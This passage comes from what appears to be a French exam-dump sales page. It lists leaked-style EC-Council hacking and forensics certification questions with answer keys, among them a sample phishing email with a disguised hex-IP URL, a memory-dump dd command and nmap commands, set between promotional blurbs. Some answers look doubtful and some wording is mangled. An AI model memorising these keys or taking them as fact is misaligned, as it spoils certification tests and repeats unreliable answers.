Answer: A

EC-COUNCIL   312-92 examen   312-92   312-92 examen   312-92

NO.14 Shayla is designing a web-based application that will pass data to and from a company extranet. This
data is very sensitive and must be protected at all costs. Shayla will use a digital certificate and a digital
signature to protect the data. The digital signature she has chosen to use is based on the difficulty in
computing discrete logarithms. Which digital signature has she chosen?
A. Rabin
B. Diffie-Hellman
C. SA-PSS
D. ElGamal
Answer: D

certification EC-COUNCIL   312-92   certification 312-92   certification 312-92   312-92 examen

NO.15 Fred is planning on using the windows socket application ClientApp.exe program to create a client-side
application that his employees will use. This program will access backend programs from two different
remote sites over WAN connections. If Fred does not make any modifications to the ClientApp.exe default
settings, what port must he have the network engineer open in order for the application to communicate?
A. 21
B. 23
C. 25
D. 80
Answer: D

EC-COUNCIL   312-92   certification 312-92   312-92   312-92

Pass4Test est un site qui peut réalise le rêve de beaucoup de professionnels. Pass4Test peut vous donner un coup de main pour réussir le test Certification EC-COUNCIL 312-92 via son guide d'étude. Est-ce que vous vous souciez de test Certification EC-COUNCIL 312-92? Est-ce que vous êtes en cours de penser à chercher quelques Q&As à vous aider? Pass4Test peut résoudre ces problèmes. Les documentations offertes par Pass4Test peuvent vous provider une préparation avant le test plus efficace. Le test de simulation de Pass4Test est presque le même que le test réel. Étudier avec le guide d'étude de Pass4Test, vous pouvez passer le test avec une haute note.

2013年11月27日星期三

Dernières EC-COUNCIL 312-50 de la pratique de l'examen questions et réponses téléchargement gratuit

Pass4Test peut vous fournir un raccourci à passer le test EC-COUNCIL 312-50: moins de temps et efforts dépensés. Vous trouverez les bonnes documentations de se former dans le site Pass4Test qui peut vous aider efficacement à réussir le test EC-COUNCIL 312-50. Si vous voyez les documentations dans les autres sites, c'est pas difficile à trouver qu''elles sont venues de Pass4Test, parce que lesquelles dans Pass4Test sont le plus complété et la mise à jour plus vite.

Pass4Test est un bon site d'offrir la facilité aux candidats de test EC-COUNCIL 312-50. Selon les anciens test, l'outil de formation EC-COUNCIL 312-50 est bien proche de test réel.

Le test EC-COUNCIL 312-50 est l'un très improtant dans tous les tests de Certification EC-COUNCIL, mais c'est toujours difficile à obtenir ce Certificat. La présence de Pass4Test est pour soulager les candidats. L'équipe de Pass4Test peut vous aider à économiser le temps et l'éffort. Vous pouvez passer le test sans aucune doute sous l'aide de notre Q&A.

Code d'Examen: 312-50
Nom d'Examen: EC-COUNCIL (Ethical Hacker Certified)
Questions et réponses: 765 Q&As

Vous pouvez s'exercer en Internet avec le démo gratuit. Vous allez découvrir que la Q&A de Pass4Test est laquelle le plus complète. C'est ce que vous voulez.

312-50 Démo gratuit à télécharger: http://www.pass4test.fr/312-50.html

NO.1 A very useful resource for passively gathering information about a target company
is:
A. Host scanning
B. Whois search
C. Traceroute
D. Ping sweep
Answer: B

certification EC-COUNCIL   312-50   certification 312-50   certification 312-50

NO.2 Who is an Ethical Hacker?
A. A person whohacksfor ethical reasons
B. A person whohacksfor an ethical cause
C. A person whohacksfor defensive purposes
D. A person whohacksfor offensive purposes
Answer: C

certification EC-COUNCIL   312-50   certification 312-50   certification 312-50

NO.3 You receive an email with the following message:
Hello Steve,
We are having technical difficulty in restoring user database record after the recent
blackout. Your account data is corrupted. Please logon to the SuperEmailServices.com
and change your password.
http://www.supermailservices.com@0xde.0xad.0xbe.0xef/support/logon.htm
If you do not reset your password within 7 days, your account will be permanently
disabled locking you out from our e-mail services.
Sincerely,
Technical Support
SuperEmailServices
From this e-mail you suspect that this message was sent by some hacker since you
have been using their e-mail services for the last 2 years and they have never sent
out an e-mail such as this. You also observe the URL in the message and confirm
your suspicion about 0xde.0xad.0xbde.0xef which looks like hexadecimal numbers.
You immediately enter the following at Windows 2000 command prompt:
Ping0xde.0xad.0xbe.0xef
You get a response with a valid IP address.
What is the obstructed IP address in the e-mail URL?
A. 222.173.190.239
B. 233.34.45.64
C. 54.23.56.55
D. 199.223.23.45
Answer: A

EC-COUNCIL   312-50   312-50 examen   312-50 examen   312-50   312-50

NO.4 A Certkiller security System Administrator is reviewing the network system log files.
He notes the following:
- Network log files are at 5 MB at 12:00 noon.
-At 14:00 hours, the log files at 3 MB.
What should he assume has happened and what should he do about the situation?
A. He should contact the attacker's ISP as soon as possible and have the connection
disconnected.
B. He should log the event as suspicious activity, continue to investigate, and take further
steps according to site security policy.
C. He should log the file size, and archive the information, because the router crashed.
D. He should run a file system check, because the Syslog server has a self correcting file
system problem.
E. He should disconnect from the Internet discontinue any further unauthorized use,
because an attack has taken place.
Answer: B

EC-COUNCIL   certification 312-50   312-50   312-50   312-50 examen

NO.5 According to the CEH methodology, what is the next step to be performed after
footprinting?
A. Enumeration
B. Scanning
C. System Hacking
D. Social Engineering
E. Expanding Influence
Answer: B

EC-COUNCIL   312-50 examen   312-50   312-50

NO.6 How does Traceroute map the route that a packet travels from point A to point B?
A. It uses a TCP Timestamp packet that will elicit a time exceed in transit message.
B. It uses a protocol that will be rejected at the gateways on its way to its destination.
C. It manipulates the value of time to live (TTL) parameter packet to elicit a time
exceeded in transit message.
D. It manipulated flags within packets to force gateways into generating error messages.
Answer: C

EC-COUNCIL examen   312-50 examen   312-50   312-50 examen   312-50

NO.7 Which one of the following is defined as the process of distributing incorrect
Internet Protocol (IP) addresses/names with the intent of diverting traffic?
A. Network aliasing
B. Domain Name Server (DNS) poisoning
C. Reverse Address Resolution Protocol (ARP)
D. Port scanning
Answer: B

EC-COUNCIL examen   312-50 examen   certification 312-50

NO.8 What are the two basic types of attacks?(Choose two.
A. DoS
B. Passive
C. Sniffing
D. Active
E. Cracking
Answer: B, D

EC-COUNCIL   312-50   312-50

NO.9 You are footprinting an organization to gather competitive intelligence. You visit
the company's website for contact information and telephone numbers but do not
find it listed there. You know that they had the entire staff directory listed on their
website 12 months ago but not it is not there.
How would it be possible for you to retrieve information from the website that is
outdated?
A. Visit google's search engine and view the cached copy.
B. Visit Archive.org web site to retrieve the Internet archive of the company's website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B

certification EC-COUNCIL   312-50   certification 312-50   312-50   certification 312-50   312-50 examen

NO.10 What does the term "Ethical Hacking" mean?
A. Someone who is hacking for ethical reasons.
B. Someone who is using his/her skills for ethical reasons.
C. Someone who is using his/her skills for defensive purposes.
D. Someone who is using his/her skills for offensive purposes.
Answer: C

certification EC-COUNCIL   312-50   certification 312-50   312-50

NO.11 Snort has been used to capture packets on the network. On studying the packets, the
penetration tester finds it to be abnormal. If you were the penetration tester, why
would you find this abnormal?
(Note: The student is being tested on concept learnt during passive OS
fingerprinting, basic TCP/IP connection concepts and the ability to read packet
signatures from a sniff dumo.)
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0XA1D95 Ack: 0x53 Win: 0x400
...
05/20-17:06:58.685879 192.160.13.4:31337 ->
172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seg: 0XA1D95 Ack: 0x53 Win: 0x400
What is odd about this attack? (Choose the most appropriate statement)
A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags.
B. This is back orifice activity as the scan comes from port 31337.
C. The attacker wants to avoid creating a sub-carrier connection that is not normally
valid.
D. There packets were created by a tool; they were not created by a standard IP stack.
Answer: B

EC-COUNCIL examen   certification 312-50   312-50   certification 312-50

NO.12 What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?
A. The ethical hacker does not use the same techniques or skills as a cracker.
B. The ethical hacker does it strictly for financial motives unlike a cracker.
C. The ethical hacker has authorization from the owner of the target.
D. The ethical hacker is just a cracker who is getting paid.
Answer: C

EC-COUNCIL   certification 312-50   312-50   312-50   312-50

NO.13 User which Federal Statutes does FBI investigate for computer crimes involving
e-mail scams and mail fraud?
A. 18 U.S.C 1029 Possession of Access Devices
B. 18 U.S.C 1030 Fraud and related activity in connection with computers
C. 18 U.S.C 1343 Fraud by wire, radio or television
D. 18 U.S.C 1361 Injury to Government Property
E. 18 U.S.C 1362 Government communication systems
F. 18 U.S.C 1831 Economic Espionage Act
G. 18 U.S.C 1832 Trade Secrets Act
Answer: B

EC-COUNCIL   312-50   certification 312-50   312-50

NO.14 Which of the following activities will NOT be considered as passive footprinting?
A. Go through the rubbish to find out any information that might have been discarded.
B. Search on financial site such as Yahoo Financial to identify assets.
C. Scan the range of IP address found in the target DNS database.
D. Perform multiples queries using a search engine.
Answer: C

EC-COUNCIL   312-50   certification 312-50   312-50 examen

NO.15 Your Certkiller trainee Sandra asks you which are the four existing Regional
Internet Registry (RIR's)?
A. APNIC, PICNIC, ARIN, LACNIC
B. RIPE NCC, LACNIC, ARIN, APNIC
C. RIPE NCC, NANIC, ARIN, APNIC
D. RIPE NCC, ARIN, APNIC, LATNIC
Answer: B

certification EC-COUNCIL   312-50 examen   312-50   312-50

NO.16 Which of the following tools are used for footprinting?(Choose four.
A. Sam Spade
B. NSLookup
C. Traceroute
D. Neotrace
E. Cheops
Answer: A, B, C, D

EC-COUNCIL   312-50   312-50   certification 312-50

NO.17 You are footprinting Acme.com to gather competitive intelligence. You visit the
acme.com websire for contact information and telephone number numbers but do
not find it listed there. You know that they had the entire staff directory listed on
their website 12 months ago but now it is not there. How would it be possible for you
to retrieve information from the website that is outdated?
A. Visit google search engine and view the cached copy.
B. Visit Archive.org site to retrieve the Internet archive of the acme website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B

EC-COUNCIL   312-50 examen   312-50   certification 312-50   certification 312-50

NO.18 Where should a security tester be looking for information that could be used by an
attacker against an organization? (Select all that apply)
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
Answer: A, B, C, D, E, F

EC-COUNCIL   312-50 examen   312-50   certification 312-50

NO.19 What is "Hacktivism"?
A. Hacking for a cause
B. Hacking ruthlessly
C. An association which groups activists
D. None of the above
Answer: A

EC-COUNCIL   312-50   312-50 examen   312-50   312-50   certification 312-50

NO.20 To what does "message repudiation" refer to what concept in the realm of email
security?
A. Message repudiation means a user can validate which mail server or servers a message
was passed through.
B. Message repudiation means a user can claim damages for a mail message that
damaged their reputation.
C. Message repudiation means a recipient can be sure that a message was sent from a
particular person.
D. Message repudiation means a recipient can be sure that a message was sent from a
certain host.
E. Message repudiation means a sender can claim they did not actually send a particular
message.
Answer: E

EC-COUNCIL   312-50   certification 312-50   312-50

Pass4Test peut offrir la facilité aux candidats qui préparent le test EC-COUNCIL 312-50. Nombreux de candidats choisissent le Pass4Test à préparer le test et réussir finalement à la première fois. Les experts de Pass4Test sont expérimentés et spécialistes. Ils profitent leurs expériences riches et connaissances professionnelles à rechercher la Q&A EC-COUNCIL 312-50 selon le résumé de test réel EC-COUNCIL 312-50. Vous pouvez réussir le test à la première fois sans aucune doute.

Pass4Test offre une formation sur EC-COUNCIL EC1-349 matériaux examen

Passer le test EC-COUNCIL EC1-349, obtenir le Passport peut améliorer la perspective de votre carrière et vous apporter plus de chances à développer votre boulot. Pass4Test est un site très convenable pour les candidats de test Certification EC-COUNCIL EC1-349. Ce site peut offrir les informations plus nouvelles et aussi provider les bonnes chances à se former davantage. Ce sont les points essentiels pour votre succès de test Certification EC-COUNCIL EC1-349.

Vous pouvez télécharger tout d'abord le démo gratuit pour prendre un essai. Vous serez confiant davantage sur Pass4Test après l'essai de démo. Vous allez réussir le test EC-COUNCIL EC1-349 sans aucune doute si vous choisissez le Pass4Test.

Aujourd'hui, c'est une société pleine de gens talentueux, la meilleure façon de suivre et assurer la place dans votre carrière est de s'améliorer sans arrêt. Si vous n'augmentez pas dans votre carrière, vous êtes juste sous-développé parce que les autres sont meilleurs que vous. Pour éviter ce cas, vous devez vous former successivement.

Pour vous laisser savoir mieux que la Q&A EC-COUNCIL EC1-349 produit par Pass4Test est persuadante, le démo de Q&A EC-COUNCIL EC1-349 est gratuit à télécharger. Sous l'aide de Pass4Test, vous pouvez non seulement passer le test à la première fois, mais aussi économiser vos temps et efforts. Vous allez trouver les questions presque même que lesquels dans le test réel. C'est pourquoi tous les candidats peuvent réussir le test EC-COUNCIL EC1-349 sans aucune doute. C'est aussi un symbole d'un meilleur demain de votre carrière.

Code d'Examen: EC1-349
Nom d'Examen: EC-COUNCIL (Computer Hacking Forensic Investigator Exam)
Questions et réponses: 180 Q&As

EC1-349 Démo gratuit à télécharger: http://www.pass4test.fr/EC1-349.html

NO.1 WPA2 provides enterprise and Wi-Fi users with stronger data protection and network access
control which of the following encryption algorithm is used DVWPA2?
A. RC4-CCMP
B. RC4-TKIP
C. AES-CCMP
D. AES-TKIP
Answer: C

certification EC-COUNCIL   EC1-349 examen   EC1-349 examen   EC1-349   EC1-349 examen

NO.2 Which of the following is not a part of the technical specification of the laboratory-based
imaging
system?
A. High performance workstation PC
B. Remote preview and imaging pod
C. Anti-repudiation techniques
D. very low image capture rate
Answer: D

certification EC-COUNCIL   certification EC1-349   EC1-349   certification EC1-349

NO.3 Which of the following email headers specifies an address for mailer-generated errors, like "no
such user" bounce messages, to go to (instead of the sender's address)?
A. Errors-To header
B. Content-Transfer-Encoding header
C. Mime-Version header
D. Content-Type header
Answer: A

certification EC-COUNCIL   certification EC1-349   certification EC1-349   EC1-349   certification EC1-349

NO.4 When dealing with the powered-off computers at the crime scene, if the computer is switched
off,
turn it on
A. True
B. False
Answer: B

EC-COUNCIL examen   EC1-349   EC1-349   EC1-349   EC1-349

NO.5 Computer forensics report provides detailed information on complete computer forensics
investigation process. It should explain how the incident occurred, provide technical details of the
incident and should be clear to understand. Which of the following attributes of a forensics report
can render it inadmissible in a court of law?
A. It includes metadata about the incident
B. It includes relevant extracts referred to In the report that support analysis or conclusions
C. It is based on logical assumptions about the incident timeline
D. It maintains a single document style throughout the text
Answer: C

certification EC-COUNCIL   certification EC1-349   certification EC1-349   certification EC1-349

NO.6 Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where, “X”
represents the _________.
A. Drive name
B. Sequential number
C. Original file name's extension
D. Original file name
Answer: A

EC-COUNCIL   EC1-349 examen   certification EC1-349   certification EC1-349   EC1-349

NO.7 Data acquisition system is a combination of tools or processes used to gather, analyze and
record
Information about some phenomenon. Different data acquisition system are used depends on the
location, speed, cost. etc. Serial communication data acquisition system is used when the actual
location of the data is at some distance from the computer. Which of the following communication
standard is used in serial communication data acquisition system?
A. RS422
B. RS423
C. RS232
D. RS231
Answer: C

EC-COUNCIL   EC1-349 examen   EC1-349   certification EC1-349

NO.8 Smith, as a part his forensic investigation assignment, has seized a mobile device. He was
asked
to recover the Subscriber Identity Module (SIM card) data the mobile device. Smith found that the
SIM was protected by a Personal identification Number (PIN) code but he was also aware that
people generally leave the PIN numbers to the defaults or use easily guessable numbers such as
1234. He unsuccessfully tried three PIN numbers that blocked the SIM card. What Jason can do in
this scenario to reset the PIN and access SIM data?
A. He should contact the device manufacturer for a Temporary Unlock Code (TUK) to gain access
to the SIM
B. He cannot access the SIM data in this scenario as the network operators or device
manufacturers have no idea about a device PIN
C. He should again attempt PIN guesses after a time of 24 hours
D. He should ask the network operator for Personal Unlock Number (PUK) to gain access to the
SIM
Answer: D

EC-COUNCIL   EC1-349   EC1-349   certification EC1-349

NO.9 Email archiving is a systematic approach to save and protect the data contained in emails so
that
it can tie easily accessed at a later date.
A. True
B. False
Answer: A

EC-COUNCIL   EC1-349   certification EC1-349   EC1-349 examen   EC1-349 examen

NO.10 During the seizure of digital evidence, the suspect can be allowed touch the computer
system.
A. True
B. False
Answer: B

EC-COUNCIL   certification EC1-349   EC1-349 examen

Pass4Test est un site web de vous offrir particulièrement les infos plus chaudes à propos de test Certification EC-COUNCIL EC1-349. Pour vous assurer à nous choisir, vous pouvez télécharger les Q&As partielles gratuites. Pass4Test vous promet un succès 100% du test EC-COUNCIL EC1-349.

2013年11月1日星期五

Le plus récent matériel de formation examen EC-COUNCIL EC0-349 de certification

La population de la Certification EC-COUNCIL EC0-349 est très claire dans l'Industrie IT. Pass4Test se contribue à vous aider à réussir le test, de plus, un an de la mise à jour gratuite pendant est gratuite pour vous. Pass4Test sera le catalyseur de la réalisation de votre rêve. Pour le succès demain, Pass4Test est votre von choix. Vous serez le prochain talent de l'Indutrie IT sous l'aide de Pass4Test.

Dans cette époque glorieuse, l'industrie IT est devenue bien intense. C'est raisonnable que le test EC-COUNCIL EC0-349 soit un des tests plus populaires. Il y a de plus en plus de gens qui veulent participer ce test, et la réussite de test EC-COUNCIL EC0-349 est le rêve pour les professionnels ambitieux.

Code d'Examen: EC0-349
Nom d'Examen: EC-COUNCIL (Computer Hacking Forensic Investigator)
Questions et réponses: 374 Q&As

La Q&A EC-COUNCIL EC0-349 de Pass4Test est liée bien avec le test réel de EC-COUNCIL EC0-349. La mise à jour gratuite est pour vous après vendre. Nous avons la capacité à vous assurer le succès de test EC-COUNCIL EC0-349 100%. Si malheureusement vous échouerez le test, votre argent sera tout rendu.

EC0-349 Démo gratuit à télécharger: http://www.pass4test.fr/EC0-349.html

NO.1 What will the following Linux command accomplish?
dd if=/dev/mem of=/home/sam/mem.bin bs=1024
A.Copy the master boot record to a file
B.Copy the contents of the system folder mem to a file
C.Copy the running memory to a file
D.Copy the memory dump file to an image file
Answer: C

EC-COUNCIL   EC0-349   EC0-349   EC0-349   EC0-349   EC0-349

NO.2 While searching through a computer under investigation, you discover numerous files that appear to
have had
the first letter of the file name replaced by
the hex code byte E5h. What does this indicate on the computer?
A.The files have been marked as hidden
B.The files have been marked for deletion
C.The files are corrupt and cannot be recovered
D.The files have been marked as read-only
Answer: B

certification EC-COUNCIL   certification EC0-349   EC0-349 examen   certification EC0-349   certification EC0-349

NO.3 Which legal document allows law enforcement to search an office, place of business, or other locale for
evidence relating to an alleged crime?
A.Search warrant
B.Subpoena
C.Wire tap
D.Bench warrant
Answer: A

EC-COUNCIL examen   EC0-349   certification EC0-349

NO.4 The efforts to obtain information before a trial by demanding documents, depositions, questions and
answers written under oath, written requests for admissions of fact, and examination of the scene is a
description of what legal term?
A.Detection
B.Hearsay
C.Spoliation
D.Discovery
Answer: D

EC-COUNCIL examen   EC0-349   EC0-349   EC0-349 examen   certification EC0-349

NO.5 You are working as an independent computer forensics investigator and receive a call from a systems
administrator for a local school system requesting
your assistance. One of the students at the local high school is suspected of downloading inappropriate
images from the Internet to a PC in the Computer Lab.
When you arrive at the school, the systems administrator hands you a hard drive and tells you that he
made a simple backup copy of the hard drive in the PC
and put it on this drive and requests that you examine the drive for evidence of the suspected images. You
inform him that a simple backup copy will not provide deleted files or recover file fragments. What type of
copy do you need to make to ensure that the evidence found is complete and admissible in future
proceedings?
A.Bit-stream copy
B.Robust copy
C.Full backup copy
D.Incremental backup copy
Answer: A

EC-COUNCIL examen   certification EC0-349   EC0-349 examen   EC0-349   EC0-349 examen

NO.6 A suspect is accused of violating the acceptable use of computing resources, as he has visited adult
websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit
these sites. However, the suspect has cleared the search history and emptied the cookie cache.
Moreover, he has removed any images he might have downloaded. What can the investigator do to prove
the violation? Choose the most feasible option.
A.Image the disk and try to recover deleted files
B.Seek the help of co-workers who are eye-witnesses
C.Check the Windows registry for connection data (You may or may not recover)
D.Approach the websites for evidence
Answer: A

EC-COUNCIL   EC0-349   certification EC0-349   EC0-349 examen

NO.7 When a router receives an update for its routing table, what is the metric value change to that path?
A.Increased by 2
B.Decreased by 1
C.Increased by 1
D.Decreased by 2
Answer: C

certification EC-COUNCIL   EC0-349   certification EC0-349   EC0-349

NO.8 A forensics investigator needs to copy data from a computer to some type of removable media so he
can
examine the information at another location. The
problem is that the data is around 42GB in size. What type of removable media could the investigator
use?
A.Blu-Ray single-layer
B.HD-DVD
C.Blu-Ray dual-layer
D.DVD-18
Answer: C

EC-COUNCIL examen   certification EC0-349   certification EC0-349   EC0-349

NO.9 Madison is on trial for allegedly breaking into her universitys internal network. The police raided her
dorm room and seized all of her computer equipment. Madisons lawyer is trying to convince the judge that
the seizure was unfounded and baseless. Under which US Amendment is Madisons lawyer trying to
prove the police violated?
A.The 10th Amendment
B.The 5th Amendment
C.The 1st Amendment
D.The 4th Amendment
Answer: D

certification EC-COUNCIL   EC0-349   EC0-349   EC0-349

NO.10 What is the last bit of each pixel byte in an image called?
A.Last significant bit
B.Least significant bit
C.Least important bit
D.Null bit
Answer: B

EC-COUNCIL examen   EC0-349 examen   certification EC0-349   EC0-349

NO.11 A picture file is recovered from a computer under investigation. During the investigation process, the
file is enlarged 500% to get a better view of its contents. The pictures quality is not degraded at all from
this process. What kind of picture is this file?
A.Raster image
B.Vector image
C.Metafile image
D.Catalog image
Answer: B

EC-COUNCIL   EC0-349   certification EC0-349   certification EC0-349

NO.12 When carrying out a forensics investigation, why should you never delete a partition on a dynamic
disk?
A.All virtual memory will be deleted
B.The wrong partition may be set to active
C.This action can corrupt the disk
D.The computer will be set in a constant reboot state
Answer: C

EC-COUNCIL   EC0-349   EC0-349 examen   EC0-349

NO.13 Sectors in hard disks typically contain how many bytes?
A.256
B.512
C.1024
D.2048
Answer: B

EC-COUNCIL   certification EC0-349   certification EC0-349

NO.14 Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows
computer?
A.The data is still present until the original location of the file is used
B.The data is moved to the Restore directory and is kept there indefinitely
C.The data will reside in the L2 cache on a Windows computer until it is manually deleted
D.It is not possible to recover data that has been emptied from the Recycle Bin
Answer: A

EC-COUNCIL   certification EC0-349   EC0-349   EC0-349   EC0-349 examen

NO.15 Which forensic investigating concept trails the whole incident from how the attack began to how the
victim was
affected?
A.Point-to-point
B.End-to-end
C.Thorough
D.Complete event analysis
Answer: B

EC-COUNCIL   EC0-349   certification EC0-349   EC0-349

NO.16 What information do you need to recover when searching a victims computer for a crime committed
with
specific e-mail message?
A.Internet service provider information
B.E-mail header
C.Username and password
D.Firewall log
Answer: B

certification EC-COUNCIL   EC0-349 examen   EC0-349   certification EC0-349

NO.17 In the following Linux command, what is the outfile?
dd if=/usr/bin/personal/file.txt of=/var/bin/files/file.txt
A./usr/bin/personal/file.txt
B./var/bin/files/file.txt
C./bin/files/file.txt
D.There is not outfile specified
Answer: B

EC-COUNCIL   EC0-349   EC0-349 examen   EC0-349 examen   EC0-349

NO.18 What hashing method is used to password protect Blackberry devices?
A.AES
B.RC5
C.MD5
D.SHA-1
Answer: D

EC-COUNCIL examen   certification EC0-349   EC0-349 examen   EC0-349 examen

NO.19 A forensics investigator is searching the hard drive of a computer for files that were recently moved to
the Recycle Bin. He searches for files in C:\RECYCLED using a command line tool but does not find
anything. What is the reason for this?
A.He should search in C:\Windows\System32\RECYCLED folder
B.The Recycle Bin does not exist on the hard drive
C.The files are hidden and he must use a switch to view them
D.Only FAT system contains RECYCLED folder and not NTFS
Answer: C

certification EC-COUNCIL   EC0-349 examen   EC0-349 examen   EC0-349

NO.20 In conducting a computer abuse investigation you become aware that the suspect of the investigation
is using ABC Company as his Internet Service Provider (ISP). You contact the ISP and request that they
provide you assistance with your investigation. What assistance can the ISP provide?
A.The ISP can investigate anyone using their service and can provide you with assistance
B.The ISP can investigate computer abuse committed by their employees, but must preserve the privacy
of their ustomers and therefore cannot assist you without a warrant
C.The ISP cannot conduct any type of investigations on anyone and therefore cannot assist you
D.ISPs never maintain log files so they would be of no use to your investigation
Answer: B

EC-COUNCIL   certification EC0-349   EC0-349   certification EC0-349

Dépenser assez de temps et d'argent pour réussir le test EC-COUNCIL EC0-349 ne peut pas vous assurer à passer le test EC-COUNCIL EC0-349 sans aucune doute. Choisissez le Pass4Test, moins d'argent coûtés mais plus sûr pour le succès de test. Dans cette société, le temps est tellement précieux que vous devez choisir un bon site à vous aider. Choisir le Pass4Test symbole le succès dans le future.

Guide de formation plus récente de EC-COUNCIL 312-50v7

Il demande les connaissances professionnelles pour passer le test EC-COUNCIL 312-50v7. Si vous manquez encore ces connaissances, vous avez besoin de Pass4Test comme une resourece de ces connaissances essentielles pour le test. Pass4Test et ses experts peuvent vous aider à renfocer ces connaissances et vous offrir les Q&As. Pass4Test fais tous efforts à vous aider à se renforcer les connaissances professionnelles et à passer le test. Choisir le Pass4Test peut non seulement à obtenir le Certificat EC-COUNCIL 312-50v7, et aussi vous offrir le service de la mise à jour gratuite pendant un an. Si malheureusement, vous ratez le test, votre argent sera 100% rendu.

Pass4Test est un site web de vous offrir particulièrement les infos plus chaudes à propos de test Certification EC-COUNCIL 312-50v7. Pour vous assurer à nous choisir, vous pouvez télécharger les Q&As partielles gratuites. Pass4Test vous promet un succès 100% du test EC-COUNCIL 312-50v7.

Code d'Examen: 312-50v7
Nom d'Examen: EC-COUNCIL (Ethical Hacking and Countermeasures (CEHv7))
Questions et réponses: 514 Q&As

Le test simulation EC-COUNCIL 312-50v7 sorti par les experts de Pass4Test est bien proche du test réel. Nous sommes confiant sur notre produit qui vous permet à réussir le test EC-COUNCIL 312-50v7 à la première fois. Si vous ne passe pas le test, votre argent sera tout rendu.

Si vous choisissez notre l'outil formation, Pass4Test peut vous assurer le succès 100% du test EC-COUNCIL 312-50v7. Votre argent sera tout rendu si vous échouez le test.

312-50v7 Démo gratuit à télécharger: http://www.pass4test.fr/312-50v7.html

NO.1 You are the security administrator of Jaco Banking Systems located in Boston. You are setting up
e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking
customer with a single password, you give them a printed list of 100 unique passwords. Each time the
customer needs to log into the e-banking system website, the customer enters the next password on the
list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no
damage is done because the password will not be accepted a second time. Once the list of 100
passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail
to the customer.
You are confident that this security implementation will protect the customer from password abuse.
Two months later, a group of hackers called "HackJihad" found a way to access the one-time password
list issued to customers of Jaco Banking Systems. The hackers set up a fake website
(http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake
website asked users for their e-banking username and password, and the next unused entry from their
one-time password sheet. The hackers collected 200 customer's username/passwords this way. They
transferred money from the customer's bank account to various offshore accounts.
Your decision of password policy implementation has cost the bank with USD 925,000 to hackers. You
immediately shut down the e-banking website while figuring out the next best security solution
What effective security solution will you recommend in this case?
A. Implement Biometrics based password authentication system. Record the customers face image to the
authentication database
B. Configure your firewall to block logon attempts of more than three wrong tries
C. Enable a complex password policy of 20 characters and ask the user to change the password
immediately after they logon and do not store password histories
D. Implement RSA SecureID based authentication system
Answer: D

certification EC-COUNCIL   312-50v7   certification 312-50v7   312-50v7

NO.2 Which of the following countermeasure can specifically protect against both the MAC Flood and MAC
Spoofing attacks?
A. Configure Port Security on the switch
B. Configure Port Recon on the switch
C. Configure Switch Mapping
D. Configure Multiple Recognition on the switch
Answer: A

certification EC-COUNCIL   312-50v7   312-50v7   312-50v7

NO.3 More sophisticated IDSs look for common shellcode signatures. But even these systems can be
bypassed, by using polymorphic shellcode. This is a technique common among virus writers ?it basically
hides the true nature of the shellcode in different disguises.
How does a polymorphic shellcode work?
A. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the
shellcode, and then executing the decrypted shellcode
B. They convert the shellcode into Unicode, using loader to convert back to machine code then executing
them
C. They reverse the working instructions into opposite order by masking the IDS signatures
D. They compress shellcode into normal instructions, uncompress the shellcode using loader code and
then executing the shellcode
Answer: A

certification EC-COUNCIL   certification 312-50v7   312-50v7

NO.4 This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and the
IDS will not spot the true nature of the fully assembled datagram. The datagram is not reassembled until it
reaches its final destination. It would be a processor-intensive task for IDS to reassemble all fragments
itself, and on a busy system the packet will slip through the IDS onto the network. What is this technique
called?
A. IP Routing or Packet Dropping
B. IDS Spoofing or Session Assembly
C. IP Fragmentation or Session Splicing
D. IP Splicing or Packet Reassembly
Answer: C

certification EC-COUNCIL   312-50v7 examen   312-50v7   312-50v7

NO.5 SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake and
opens a large number of half-open TCP connections. The signature of attack for SYN Flood contains:
A. The source and destination address having the same value
B. A large number of SYN packets appearing on a network without the corresponding reply packets
C. The source and destination port numbers having the same value
D. A large number of SYN packets appearing on a network with the corresponding reply packets
Answer: B

EC-COUNCIL examen   312-50v7   312-50v7

NO.6 How do you defend against Privilege Escalation?
A. Use encryption to protect sensitive data
B. Restrict the interactive logon privileges
C. Run services as unprivileged accounts
D. Allow security settings of IE to zero or Low
E. Run users and applications on the least privileges
Answer: A,B,C,E

EC-COUNCIL examen   312-50v7 examen   312-50v7 examen   certification 312-50v7   312-50v7   certification 312-50v7

NO.7 Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order
to find some information about the target they are attempting to penetrate. How would you call this type of
activity?
A. Dumpster Diving
B. Scanning
C. CI Gathering
D. Garbage Scooping
Answer: A

certification EC-COUNCIL   312-50v7 examen   312-50v7   312-50v7 examen

NO.8 You run nmap port Scan on 10.0.0.5 and attempt to gain banner/server information from services
running on ports 21, 110 and 123.
Here is the output of your scan results:
Which of the following nmap command did you run?
A. nmap -A -sV -p21,110,123 10.0.0.5
B. nmap -F -sV -p21,110,123 10.0.0.5
C. nmap -O -sV -p21,110,123 10.0.0.5
D. nmap -T -sV -p21,110,123 10.0.0.5
Answer: C

EC-COUNCIL   certification 312-50v7   certification 312-50v7

NO.9 What type of attack is shown in the following diagram?
A. Man-in-the-Middle (MiTM) Attack
B. Session Hijacking Attack
C. SSL Spoofing Attack
D. Identity Stealing Attack
Answer: A

EC-COUNCIL   312-50v7 examen   certification 312-50v7   312-50v7 examen

NO.10 If a competitor wants to cause damage to your organization, steal critical secrets, or put you out of
business, they just have to find a job opening, prepare someone to pass the interview, have that person
hired, and they will be in the organization.
How would you prevent such type of attacks?
A. It is impossible to block these attacks
B. Hire the people through third-party job agencies who will vet them for you
C. Conduct thorough background checks before you engage them
